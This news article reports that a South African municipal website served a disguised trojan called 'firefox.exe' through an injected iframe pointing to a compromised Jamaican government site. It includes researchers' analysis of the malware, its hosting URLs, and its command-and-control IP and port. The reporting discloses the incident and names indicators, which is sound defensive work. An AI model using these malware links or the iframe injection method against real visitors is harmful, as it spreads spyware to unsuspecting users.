Mangaung website hacked, serving malware from Jamaica
The website for the Mangaung municipality (mangaung.co.za, bloemfontein.co.za) is serving malware hosted on the website of the Jamaica Cultural Development Commission (jcdc.gov.jm).
At the time of writing, more than a day after informing both the State Information Technology Agency (SITA) and the JCDC, a Windows executable is automatically downloaded to your computer when you visit the website of the Mangaung municipality.
Interestingly, visiting the the JCDC website did not trigger the file download.
The executable is called “firefox.exe” and it was embedded in the Mangaung website using a simple HTML <iframe> tag pointing to http://www.jcdc.gov.jm/uploads/firefox.exe.
The source of the Mangaung website also contained an iframe pointing to a firefox.exe file hosted on shell32.tk, but it appeared to be inaccessible.
Masquerading as Firefox? Smells like FinSpy
A report recently released by Citizen Lab revealed that a spyware suite used by governments known as FinFisher sometimes had its trojan (FinSpy) masquerade as Firefox.
Add to this that Citizen Lab reported that it had discovered command & control servers for the spyware suite on the Telkom network in South Africa, and a logical first reaction is to suspect that a version of the FinSpy trojan was being hosted on the Mangaung website.
However, Citizen Lab’s report suggests that FinSpy would use far less overt methods of infecting a machine.
An investigation by Citizen Lab, which was later confirmed by Sensepost, indicated that the malware was not FinFisher.
Taiwanese spyware?
A quick check on VirusTotal did not provide conclusive results as to what this malware might be, but further prodding from Sensepost revealed that the trojan was written in .NET.
Jeremy du Bruyn, a security expert at Sensepost, explained the trojan’s code had been obfuscated, making it more difficult to see what its purpose is.
“It employs a number of measures to make static analysis of the malware more difficult, for instance by calling ‘IsDebuggerPresent’ to check if it is being analysed and if so exit; as well as not using any hardcoded strings,” Du Bruyn said.
The trojan developer appears to be Chinese-speaking, Du Bruyn said, which he said correlates with the Taiwanese IP address of the command & control server.
“The Trojan communicates with an IP in Taiwan, specifically 114.34.216.71 on port 888,” Du Bruyne said.
Malware still being served
At the time of publication the Mangaung website was still serving the malware, despite SITA and the JDCD being alerted to it on Thursday, 30 May 2013.
While the JDCD did not respond by the time of publication, a SITA spokesperson did tell MyBroadband that they don’t provide the hosting for this particular government website.
Thanks to Siavosh, Jeremy, and Dominic of Sensepost for their work in analysing the malware. Thanks to John and the team from Citizen Lab who also provided valuable information for this article.
More on information security in South Africa
ADSL router security concern in SA
SAPS website still vulnerable: hacker
Slow ADSL? It could be a cyber-attack
Spyware servers in South Africa: the plot thickens
SA first in Africa… for malware
AARTO website hack: are you at risk?
Internet bank fraud affects few: Absa